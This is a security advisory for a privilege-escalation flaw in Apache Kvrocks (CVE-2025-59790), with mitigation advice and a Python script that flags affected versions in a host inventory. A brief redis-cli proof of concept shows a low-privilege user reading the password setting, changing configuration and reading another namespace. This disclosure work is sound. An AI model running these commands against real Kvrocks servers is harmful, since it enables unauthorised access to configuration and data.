Medium | CVSS 5.4 | Privilege Escalation | CVE-2025-59790

Published 2025

Apache Kvrocks Privilege Escalation

BugBunny.ai discovered a privilege escalation vulnerability in Apache Kvrocks where namespace token validation allowed users to escalate privileges across namespaces, potentially accessing admin-level functionality with limited credentials.

Responsibly Disclosed

Summary

Impact: Low-privilege users can execute privileged commands
Vector: Namespace token validation bypass
Affected: Kvrocks 2.9.0 - 2.13.0
Status: Fixed in v2.14.0

Proof of Concept

# Connect as low-privilege user
redis-cli -h kvrocks-host -p 6666 -a low_priv_password

# Despite limited permissions, execute privileged commands
> CONFIG GET requirepass
1) "requirepass"
2) ""

# Or modify configuration that should be admin-only
> CONFIG SET maxclients 100
OK

# In vulnerable versions (2.9.0-2.13.0), namespace token
# validation allowed privilege escalation across namespaces
> NAMESPACE GET admin_namespace
# Returns data from admin namespace despite lacking permission

# Fixed in v2.14.0: Proper privilege checks now enforced

Mitigation

Upgrade to Apache Kvrocks v2.14.0 or later. The fix implements proper privilege checks for all commands.
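
To find which deployments still need the upgrade, the following added example (not part of the original advisory or the Kvrocks project) classifies an inventory of version strings against the affected range stated above. The inventory format, host names and function names are assumptions made for illustration; how the version strings are collected is left to the operator.

```python
import re

# Range taken from the advisory: affected 2.9.0 - 2.13.0, fixed in 2.14.0.
AFFECTED_MIN = (2, 9, 0)
FIXED = (2, 14, 0)

# Constructed sample inventory: one "<host> <version>" pair per line.
SAMPLE_INVENTORY = """
# host     version
cache-a    2.8.0
cache-b    2.9.0
cache-c    v2.13.0
cache-d    2.14.0
cache-e    unstable
"""

def parse_version(text):
    """Return (major, minor, patch), or None for anything that is not a plain release."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    return tuple(int(p) for p in m.groups()) if m else None

def classify(version_text):
    """Map a version string to 'affected', 'fixed', 'not-listed' or 'unknown'."""
    v = parse_version(version_text)
    if v is None:
        return "unknown"      # dev builds, suffixed tags: needs manual review
    if v >= FIXED:
        return "fixed"
    # Assumption: any release from 2.9.0 up to (not including) the fixed
    # version is treated as affected, since the fix is stated for 2.14.0.
    if v >= AFFECTED_MIN:
        return "affected"
    return "not-listed"       # older than the range the advisory names

def audit(inventory_text):
    """Return {host: status} for every non-comment line of the inventory."""
    result = {}
    for line in inventory_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        result[parts[0]] = classify(parts[1] if len(parts) > 1 else "")
    return result

def needs_attention(inventory_text):
    """Hosts to upgrade or review: affected versions plus unparseable ones."""
    statuses = audit(inventory_text)
    return sorted(h for h, s in statuses.items() if s in ("affected", "unknown"))

if __name__ == "__main__":
    for host, status in audit(SAMPLE_INVENTORY).items():
        print(f"{host}: {status}")
```

Version strings that are not a plain `major.minor.patch` release are reported as `unknown` rather than guessed, so development builds and suffixed tags get a manual check.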

Credits & Disclosure

Identified by BugBunny.ai and responsibly disclosed to the Apache Kvrocks maintainers.

Reporter: BugBunny.ai | CVE-2025-59790